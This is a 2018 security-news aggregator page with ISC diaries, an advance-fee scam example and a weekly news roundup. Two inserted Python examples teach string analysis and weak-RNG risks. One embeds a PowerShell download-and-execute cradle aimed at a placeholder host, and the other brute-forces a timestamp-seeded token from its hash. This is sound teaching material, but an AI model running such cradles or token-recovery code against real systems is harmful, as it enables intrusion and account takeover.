Security Posts

ISC Stormcast For Monday, December 10th 2018 https://isc.sans.edu/podcastdetail.html?id=6286
Categories: Security Posts

Nominated for the IT Blog Awards

/dev/random - 1 hour 37 min ago
This morning, I received a mail from Cisco to tell me that I’ve been nominated as finalist for their IT Blog Awards (Category: “Most Inspirational”). I’m maintaining this blog just for the fun and to share useful (I hope) information with my readers and don’t do this to get rewards but it’s always nice to get such feedback. The final competition is now open, if you’ve a few minutes, just vote for me! Votes are open here. Thank you! [The post Nominated for the IT Blog Awards has been first published on /dev/random]

Network Security Resilience – What Is It?

BreakingPoint Labs Blog - 3 hours 2 min ago
In a recent webinar, Best Practices for Security Resilience, Jon Oltsik (an analyst from ESG…

Building a data lake? Tips for advanced data analysis.

BreakingPoint Labs Blog - 3 hours 2 min ago
Data can now be collected from nearly every corner of an organization’s operation and mined to…

Ixia at SC18

BreakingPoint Labs Blog - 3 hours 2 min ago
Ixia has maintained a lasting presence at the annual Supercomputing Conference (SC18 this year).…

SNMP: The ABCs of Network Visibility

BreakingPoint Labs Blog - 3 hours 2 min ago
Network management and monitoring is a large topic. It includes device monitoring and management,…

Are your IPsec Tunnels Misbehaving?

BreakingPoint Labs Blog - 3 hours 2 min ago
In one of my previous blog posts, I was emphasizing the fact that IPsec is not going away anytime…

Zero Touch Programming – How to Decrease Monitoring Equipment Programming Time

BreakingPoint Labs Blog - 3 hours 2 min ago
One of the key factors of any IT purchase is the usability of the product or solution. In fact,…

Using public cloud? Why you need cloud visibility.

BreakingPoint Labs Blog - 3 hours 2 min ago
Public cloud usage is widespread in enterprises and public sector environments worldwide. The most…

SCADA and Secure Infrastructure

BreakingPoint Labs Blog - 3 hours 2 min ago
Recently Chuck McAuley wrote on how his father taught him how to “think sideways” or maintain a…

Does cloud computing threaten our critical infrastructure?

BreakingPoint Labs Blog - 3 hours 2 min ago
Around the globe, advanced technology is now essential to the development and operation of…

Prevent DDoS Attacks from IoT Devices on Critical Infrastructure with These 4 Tips

BreakingPoint Labs Blog - 3 hours 2 min ago
On April 9, 2009, an act of sabotage on an underground fiber optic cable in my small town brought…


Arrest of Huawei CFO Inspires Advance Fee Scam, (Sun, Dec 9th)

Last week, the arrest of MENG Wanzou made big waves in the news. Ms. Meng was arrested in Canada based on an arrest warrant issued for the United States Department of Justice. Ms. Meng, as CFO of Huawei and possible heir to her father, the CEO of Huawei, is assumed to have access to substantial wealth. This led to a wave of advance fee scams leveraging this news.

Advance fee scams have probably been most commonly associated with "Nigerian Prince" scams. The trick is to promise substantial wealth in exchange for a relatively small advance fee. In this case, the message sent via WeChat suggested that a corrupt Canadian guard would let Ms. Meng escape for a few thousand dollars. The recipient of the message is asked to transfer the money to the guard's account, and is promised a large amount of money once Ms. Meng is released.

Translation: "Hello, I am MENG Wanzou. Currently, I have been detained by Canadian customs. I have limited use of my phone. Right now the CIA is trying to get me into the hands of the US government. I bribed the guard of my room, and urgently need US$2000 to get out of here. Once I am out, I will reward you with 200,000 shares of Huawei. I will be good on my word. If you are single, we can also discuss the important thing in life. The guard’s name is David, the account number is 52836153836252, swift 55789034. I will be good on my word."

Of course, it is questionable how successful a crude attempt like this will be. But sadly, experience tells us that there are still people falling for the old "Nigerian scam". By targeting Chinese individuals via WeChat, the scam may have a higher success rate than more widely distributed scams.

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Update: rtfdump.py Version 0.0.9

Didier Stevens - 8 hours 48 min ago
This new version (actually, 0.0.8 and 0.0.9) brings the following changes:
  1. All items can be selected now with -s a.
  2. A warning is displayed when option -s (selecting) does not result in the selection of an item.
  3. Option -A does a run-length encoded ASCII dump (cf. -a).
  4. JSON output is possible with option --jsonoutput.
  5. Ad-hoc YARA rules can now also be hexadecimal (#x#) or regular expression (#r#).
  6. Offsets in a cut expression can now be hexadecimal too (prefix 0x).
rtfdump_V0_0_9.zip (https)
MD5: 26BE358EC8D42BB7532B6C0C1EBAD1F2
SHA256: 3F6410AC7880116CDDE4480367D3F5AA534CCA3047B75FEA0F4BA1F5EAA97B07

Quickie: String Analysis is Still Useful, (Sun, Dec 9th)

SANS Internet Storm Center, InfoCON: green - Mon, 2018/12/10 - 00:52
String analysis: extracting and analyzing strings from binary files (like executables) to assist with reverse engineering. It's a simple method, but still useful, if you don't have to spend hours sifting through all the strings produced by the strings tool.

I have a tip to quickly find "interesting" strings: sort the output of the strings tool by string length. Start with the shortest strings, and end with the longest strings.

Take for example the analysis of a malicious document, which involved many steps and requires good knowledge of different file formats. Just by extracting the strings of this document and sorting them by length, you immediately find the PowerShell command:

I developed my own strings.py tool, and option -L sorts strings by increasing length.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com
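The sort-by-length trick above, as an added Python example that is not part of the diary and is not Didier's strings.py: it pulls ASCII and UTF-16LE strings out of a byte blob, orders them by increasing length the way -L does, and, because the longest string in a maldoc is so often a PowerShell command line, decodes an -EncodedCommand argument when it finds one. The SAMPLE bytes, the example.invalid URL and the helper names are constructed for this example.

```python
import base64
import re
from typing import List, Optional, Tuple

MIN_LEN = 4  # same default minimum length as GNU strings

# Constructed stand-in for a malicious document (not a real sample): file
# header bytes and noise around one UTF-16LE string and an embedded
# PowerShell download cradle with an -EncodedCommand payload. The URL is a
# reserved .invalid name and never resolves.
_STAGE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
_ENCODED = base64.b64encode(_STAGE.encode("utf-16-le")).decode("ascii")
SAMPLE = (
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1\x00\x00Root Entry\x00\x00\x05\x00ok\x00\x00"
    + "cmd.exe".encode("utf-16-le")
    + b"\xff\xfe\x00\x00"
    + ("powershell -nop -w hidden -e " + _ENCODED).encode("ascii")
    + b"\x00\x00MSWordDoc\x00"
)


def extract_strings(data: bytes, min_len: int = MIN_LEN) -> List[Tuple[int, str, str]]:
    """Return (offset, encoding, text) for every run of at least min_len printable
    characters, once as 8-bit ASCII and once as UTF-16LE (printable byte, NUL)."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [(m.start(), "ascii", m.group().decode("ascii")) for m in ascii_re.finditer(data)]
    found += [(m.start(), "utf16le", m.group().decode("utf-16-le")) for m in utf16_re.finditer(data)]
    return found


def strings_by_length(data: bytes, min_len: int = MIN_LEN) -> List[Tuple[int, str, str]]:
    """Sort by increasing length, then by offset: the view strings.py -L gives,
    with command lines and encoded blobs landing at the bottom of the list."""
    return sorted(extract_strings(data, min_len), key=lambda t: (len(t[2]), t[0]))


# PowerShell accepts any unambiguous prefix of -EncodedCommand; longest first
# so the alternation does not stop at a bare "-e" inside "-enc".
ENCODED_CMD_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(text: str) -> Optional[str]:
    """If a string carries a PowerShell -e/-enc/-EncodedCommand argument, return
    the decoded script (the argument is base64 over UTF-16LE); otherwise None."""
    m = ENCODED_CMD_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


if __name__ == "__main__":
    listing = strings_by_length(SAMPLE)
    for offset, enc, text in listing:
        print(f"{offset:#08x} {enc:8} {len(text):4} {text}")
    print("decoded:", decode_encoded_command(listing[-1][2]))
```

Run as a script it prints offset, encoding, length and text, shortest first; on a real file, pass open(path, "rb").read() and expect the bottom of the list to hold command lines, URLs, base64 blobs and long padding runs that GNU strings would bury among thousands of short entries. The separate UTF-16LE pass matters because Windows-hosted payloads and wide-string resources are invisible to an 8-bit-only scan.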

Things I Hearted This Week, 7th December 2018

AlienVault Blogs - Fri, 2018/12/07 - 16:00
It’s December, so you’re either on holiday, wishing you were on holiday, or hoping the next security article you read isn’t related to predictions. Well, I can’t help you with the holidays, but I can promise there will be no predictions here. It’s just good old-fashioned news: the juiciest news that made my heart flutter.

US Postal Service

Ah, the good old USPS was running a weakness that allowed anyone who has an account to view details of around 60 million users, and in some cases modify the account details on their behalf. Luckily, a security researcher spotted the error about a year ago and notified USPS. Unluckily, the USPS didn’t respond to the researcher or fix the issue. Luckily, the researcher reached out to a little-known cyber-reporter by the name of Brian Krebs, who contacted USPS and, lo and behold, a miracle happened and the issue was fixed in 48 hours! This raises the question of whether there is anything lesser-known researchers who don’t have the public profile of Brian Krebs can do to help companies fix issues outside of a formally defined bug bounty program. Back in September, Troy Hunt posted on this very topic, the effectiveness of publicly shaming bad security. Not to say I agree with shaming companies, but when you look at instances like USPS, you do wonder if there is a better way.

GCHQ Reveals it Doesn't Always Tell Firms if Their Software is Vulnerable to Cyber Attacks

In other words, spy agency keeps secrets. There are four reasons given as to why GCHQ may not disclose flaws, being:
  1. There is no way to fix it
  2. The product is no longer supported
  3. The product is so poorly designed it can never be secure
  4. There is an overriding intelligence requirement that cannot be fulfilled in any other way
I particularly like number 4 as the catch-all clause. You could say there’s an overriding intelligence requirement for almost anything, and refuse to release any details under secrecy laws. I’m not necessarily bashing GCHQ; governments have been known for stockpiling exploits. They have a particular mission and objective, and this is how they go about fulfilling it. However, it does mean companies should not rely solely on GCHQ or other government agencies for their threat intelligence. Rather, building their own capabilities and threat-sharing channels remains necessary.

Scamming the Scammers

I don’t think there are many stories more satisfying than when scammers get taken for a ride. This time courtesy of Hacker Fantastic, who got contacted by the famous singer Rihanna out of the blue to help her get some money.

ENISA Releases Online NIS Directive Tool

ENISA released an interactive tool showing the relevant national laws and regulations and, per sector and subsector, the national authorities supervising the NIS Directive. It’s pretty cool.

Open Source Intelligence: A Key Under The Proverbial Mat

In an age when everyone is connected, many businesses are forced to interact with the public via the internet. People are carrying small computers (phones) in their pockets, with more homes having computers than generations before us. According to the U.S. Census Bureau's 2015 Computer and Internet Use in the United States: American Community Survey Reports, "Among all households, 78 percent had a desktop or laptop, 75 percent had a handheld computer such as a smartphone or other handheld wireless computer, and 77 percent had a broadband Internet subscription."

Why Security Firms Do Not Share The Cost Of Bad Reputation After A Cyberattack?

The whole security story looks as if it were a play where at the beginning both customer and security firm share the publicity lights when they sign a contract, but soon the lights turn off, the disaster strikes and it turns into a one-act play. This is where I agree that more transparency is needed, and insurance or warranties can go a long way to help in this regard. Related to infosec warranties.

On The Insecurity of Math.Random and its Siblings

During code reviews we often see developers using weak RNGs like math.random() to generate cryptographic secrets. We think it is commonly known that weak random number generators (RNGs) must not be used for any kind of secret and recommend using secure alternatives. I explicitly did not state a specific language yet, because basically every language offers both weak and strong RNGs. So I asked myself: What if I use a weak RNG to generate a secret? Is it possible to recover the secret from some derived value, like a hash?

Why Hospitals Are The Next Frontier of Cybersecurity

Hospital cybersecurity is a pressing problem with unique challenges and incalculable stakes. The healthcare industry’s accelerating adoption of sophisticated networks, connected devices and digital records has revolutionized clinical operations and patient care but has also left modern hospitals acutely vulnerable to cyber attack. Recent high-profile hacks have brought these mounting threats sharply into focus. However, despite increasing efforts and awareness, a number of technological, cultural and regulatory issues complicate healthcare cybersecurity.

Other Things I Liked
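The question the Math.random item asks (can a secret be recovered from a derived value such as its hash?) worked through as an added Python example, not code from this newsletter or from the post it links to: the weak generator is Python's random module seeded from a timestamp, standing in for Math.random() and its siblings, the secret is a 16-character password-reset token, and the attacker holds only the token's SHA-256 digest plus a rough idea of when it was issued. Token format, alphabet, the timestamp seed and the one-hour search window are assumptions made for the demonstration.

```python
import hashlib
import random
import secrets
import string
from typing import Optional

ALPHABET = string.ascii_letters + string.digits
TOKEN_LEN = 16


def weak_token(seed: int, length: int = TOKEN_LEN) -> str:
    """Vulnerable pattern (constructed for this example): a deterministic PRNG
    seeded from a low-entropy value, here a Unix timestamp in seconds, picks
    the characters of a password-reset token."""
    rng = random.Random(seed)  # Mersenne Twister: output is a pure function of the seed
    return "".join(rng.choice(ALPHABET) for _ in range(length))


def strong_token(length: int = TOKEN_LEN) -> str:
    """Fix: draw from the OS CSPRNG via secrets; there is no seed to replay."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def sha256_hex(value: str) -> str:
    """The 'derived value' an attacker may obtain, e.g. from a leaked token table."""
    return hashlib.sha256(value.encode("utf-8")).hexdigest()


def recover_from_hash(token_hash: str, approx_issued: int, window: int = 3600) -> Optional[str]:
    """Attacker side: knowing only the hash and roughly when the token was issued
    (say, the timestamp of the reset e-mail), regenerate the token for every seed
    within +/- window seconds and compare digests. Returns the token, or None."""
    for seed in range(approx_issued - window, approx_issued + window + 1):
        candidate = weak_token(seed)
        if sha256_hex(candidate) == token_hash:
            return candidate
    return None


if __name__ == "__main__":
    issued = 1544400000  # constructed issue time, early December 2018
    leaked = sha256_hex(weak_token(issued))
    print("weak token recovered:  ", recover_from_hash(leaked, issued + 900))
    leaked = sha256_hex(strong_token())
    print("strong token recovered:", recover_from_hash(leaked, issued + 900))
```

Once the seed is guessable the hash is no protection at all: the attacker regenerates candidates and compares digests, and a 7,201-seed window costs a fraction of a second. Seeding from a larger or hidden value only widens the search and does not fix the design; even an unseeded Mersenne Twister gives up its full state after 624 consecutive 32-bit outputs are observed. The fix is the generator, not the seed, which is what secrets.choice (or secrets.token_urlsafe) provides.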

IDA 7.2 – The Mac Rundown

Hex blog - Wed, 2018/11/28 - 17:19
We posted an addendum to the release notes for IDA 7.2: The Mac Rundown. It dives much deeper into the Mac-specific features introduced in 7.2, and should be great reference material for users interested in reversing the latest Apple binaries. It’s packed full of hints, tricks, and workarounds. We hope you will find it quite …

Pattern Welding Explained as Wearable Art

Niels Provos - Tue, 2018/08/28 - 06:37

Pattern-welding was used throughout the Viking age to imbue swords with intricate patterns that were associated with mystical qualities. This visualization shows the pattern progression in a twisted rod with increasing removal of material. It took me two years of intermittent work to get to this image. I liked this image so much that I ordered it for myself as a t-shirt and am looking forward to people asking me what the image is all about. If you want to get a t-shirt yourself, you can order this design via RedBubble. If you end up ordering a t-shirt, let me know if it gets you into any interesting conversations!
